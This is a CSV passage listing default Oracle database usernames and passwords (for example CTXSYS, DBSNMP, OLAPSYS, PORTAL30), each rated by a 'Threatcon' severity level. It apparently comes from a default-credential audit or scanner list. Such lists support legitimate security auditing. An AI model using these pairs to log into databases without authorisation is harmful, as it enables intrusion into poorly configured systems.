serious),,\noracle,Database,Any,,CSL,CSL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CSMIG,CSMIG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CSP,CSP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSR,CSR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSS,CSS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CTXDEMO,CTXDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CTXSYS,,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,CHANGE_ON_INSTALL,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,CTXSYS,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,UNKNOWN,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,lt;UNKNOWNgt;,Threatcon 1 (most serious),,\noracle,Database,Any,,CUA,CUA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUE,CUE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUF,CUF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUG,CUG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CUI,CUI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUN,CUN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUP,CUP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUS,CUS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CZ,CZ,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DATA_SCHEMA,LASKJDF098KSDAF09,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DBI,MUMBLEFRATZ,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DBSNMP,DBSNMP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DBVISION,DBVISION,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DCM,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DCM,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DDIC,199220706,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DEMO,DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DEMO8,DEMO8,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DEMO9,DEMO9,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DES,DES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DES2K,DES2K,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DEV2000_DEMOS,DEV2000_DEMOS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DIANE,PASSWO1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DIP,DIP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DISCOVERER5,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DISCOVERER5,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DMSYS,DMSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DPF,DPFPASS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DSGATEWAY,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DSGATEWAY,DSGATEWAY,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DSGATEWAY,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DSSYS,DSSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DTSP,DTSP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EAA,EAA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EAM,EAM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EARLYWATCH,SUPPORT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EAST,EAST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EC,EC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ECX,ECX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EJB,EJB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EJSADMIN,EJSADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EJSADMIN,EJSADMIN_PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EMP,EMP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ENG,ENG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ENI,ENI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ESTOREUSER,ESTORE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EVENT,EVENT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EVM,EVM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EXAMPLE,EXAMPLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EXFSYS,EXFSYS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EXTDEMO,EXTDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EXTDEMO2,EXTDEMO2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FA,FA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FEM,FEM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FII,FII,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FINANCE,FINANCE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FINPROD,FINPROD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FLM,FLM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FND,FND,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FOO,BAR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FPT,FPT,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FRM,FRM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FROSTY,SNOWMAN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FTE,FTE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FV,FV,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GL,GL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,GMA,GMA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMD,GMD,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GME,GME,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMF,GMF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMI,GMI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GML,GML,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMP,GMP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMS,GMS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GPFD,GPFD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,GPLD,GPLD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,GR,GR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,HADES,HADES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HCPARK,HCPARK,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HLW,HLW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,HR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HRI,HRI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,HVST,HVST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HXC,HXC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,HXT,HXT,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBA,IBA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBE,IBE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBP,IBP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBU,IBU,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBY,IBY,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ICDBOWN,ICDBOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ICX,ICX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IDEMO_USER,IDEMO_USER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IEB,IEB,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IEC,IEC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IEM,IEM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IEO,IEO,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IES,IES,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IEU,IEU,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IEX,IEX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IFSSYS,IFSSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IGC,IGC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IGF,IGF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IGI,IGI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IGS,IGS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IGW,IGW,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IMAGEUSER,IMAGEUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IMC,IMC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IMEDIA,IMEDIA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IMT,IMT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,INTERNAL,ORACLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,INTERNAL,SYS_STNT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,INV,INV,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IPA,IPA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IPD,IPD,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IPLANET,IPLANET,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ISC,ISC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ITG,ITG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JA,JA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JAKE,PASSWO4,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JE,JE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JG,JG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JILL,PASSWO2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JL ,JL ,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JL,JL,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JMUSER,JMUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JOHN,JOHN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JONES,STEEL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JTF,JTF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JTM,JTM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JTS,JTS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JWARD,AIROPLANE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,KWALKER,KWALKER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,L2LDEMO,L2LDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,LBACSYS,LBACSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,LIBRARIAN,SHELVES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MANPROD,MANPROD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MARK,PASSWO3,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MASCARM,MANAGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MASTER,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDATA,MDDATA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO,MDDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO_CLERK,CLERK,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO_CLERK,MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO_MGR,MDDEMO_MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO_MGR,MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDSYS,MDSYS,Threatcon 1 (most serious),,\noracle,Database,Any,,ME,ME,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MFG,MFG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MGR,MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MGWUSER,MGWUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MIGRATE,MIGRATE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MILLER,MILLER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MMO2,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MMO2,MMO2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MMO2,MMO3,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MMO2,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MODTEST,YES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MOREAU,MOREAU,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MRP,MRP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MSC,MSC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MSD,MSD,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MSO,MSO,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MSR,MSR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MTSSYS,MTSSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MTS_USER,MTS_PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MWA,MWA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MXAGENT,MXAGENT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NAMES,NAMES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NEOTIX_SYS,NEOTIX_SYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NNEUL,NNEULPASS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NOMEUTENTE,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NOME_UTILIZADOR,SENHA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NOM_UTILISATEUR,MOT_DE_PASSE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NUME_UTILIZATOR,PAROL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OAIHUB902,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OAIHUB902,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OAS_PUBLIC,OAS_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OCITEST,OCITEST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OCM_DB_ADMIN,OCM_DB_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODM,ODM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODM_MTR,MTRPW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODS,ODS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODSCOMMON,ODSCOMMON,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODS_SERVER,ODS_SERVER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OE,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OE,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OE,OE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OE,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OEMADM,OEMADM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OEMREP,OEMREP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OEM_REPOSITORY,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OEM_REPOSITORY,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OKB,OKB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OKC,OKC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OKE,OKE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OKI,OKI,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OKO,OKO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OKR,OKR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OKS,OKS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OKX,OKX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OLAPDBA,OLAPDBA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OLAPSVR,INSTANCE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OLAPSVR,OLAPSVR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OLAPSYS,MANAGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OLAPSYS,OLAPSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OMWB_EMULATION,ORACLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ONT,ONT,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OO,OO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OPENSPIRIT,OPENSPIRIT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OPI,OPI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ORACACHE,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORACACHE,ORACACHE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORACACHE,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORACLE,ORACLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORADBA,ORADBAPASS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORANGE,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORANGE,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORAPROBE,ORAPROBE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORAREGSYS,ORAREGSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO,ORASSO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO_DS,ORASSO_DS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO_PA,ORASSO_PA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO_PS,ORASSO_PS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO_PUBLIC,ORASSO_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASTAT,ORASTAT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORCLADMIN,WELCOME,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORDCOMMON,ORDCOMMON,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORDPLUGINS,ORDPLUGINS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORDSYS,ORDSYS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OSE$HTTP$ADMIN,INVALID,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSE$HTTP$ADMIN,Invalid password,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSM,OSM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OSP22,OSP22,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_HOST,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_HOST,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_PUB,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_PUB,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_SUB,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_SUB,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OTA,OTA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OUTLN,OUTLN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OWA,OWA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWA_PUBLIC,OWA_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWF_MGR,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWF_MGR,OWF_MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWF_MGR,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWNER,OWNER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OZF,OZF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OZP,OZP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OZS,OZS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PA,PA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PANAMA,PANAMA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PATROL,PATROL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PAUL,PAUL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PERFSTAT,PERFSTAT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PERSTAT,PERSTAT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PJM,PJM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PLANNING,PLANNING,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PLEX,PLEX,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PLSQL,SUPERSECRET,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PM,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PM,PM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PM,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PMI,PMI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PN,PN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PO,PO,Threatcon 1 (most serious),,\noracle,Database,Any,,PO7,PO7,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PO8,PO8,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,POA,POA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,POM,POM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PORTAL,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30,PORTAL30,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30,PORTAL31,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_ADMIN,PORTAL30_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_DEMO,PORTAL30_DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_PS,PORTAL30_PS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_SSO,PORTAL30_SSO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_SSO_ADMIN,PORTAL30_SSO_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_APP,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_APP,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_DEMO,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_DEMO,PORTAL_DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_DEMO,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_PUBLIC,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_PUBLIC,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_SSO_PS,PORTAL_SSO_PS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,POS,POS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,POWERCARTUSER,POWERCARTUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PRIMARY,PRIMARY,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PSA,PSA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PSB,PSB,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PSP,PSP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PUBSUB,PUBSUB,Threatcon 1 (most serious),,\noracle,Database,Any,,PUBSUB1,PUBSUB1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PV,PV,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,QA,QA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,QDBA,QDBA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QP,QP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,QS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS,QS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ADM,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ADM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ADM,QS_ADM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ADM,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CB,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CB,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CB,QS_CB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CB,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CBADM,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CBADM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CBADM,QS_CBADM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CBADM,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CS,QS_CS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CS,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ES,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ES,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ES,QS_ES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ES,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_OS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_OS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_OS,QS_OS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_OS,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_WS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_WS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_WS,QS_WS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_WS,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,RE,RE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REPADMIN,REPADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REPORTS,REPORTS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REPORTS_USER,OEM_TEMP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REP_MANAGER,DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REP_OWNER,DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REP_OWNER,REP_OWNER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REP_USER,DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,RG,RG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,RHX,RHX,Threatcon 2 (1 is 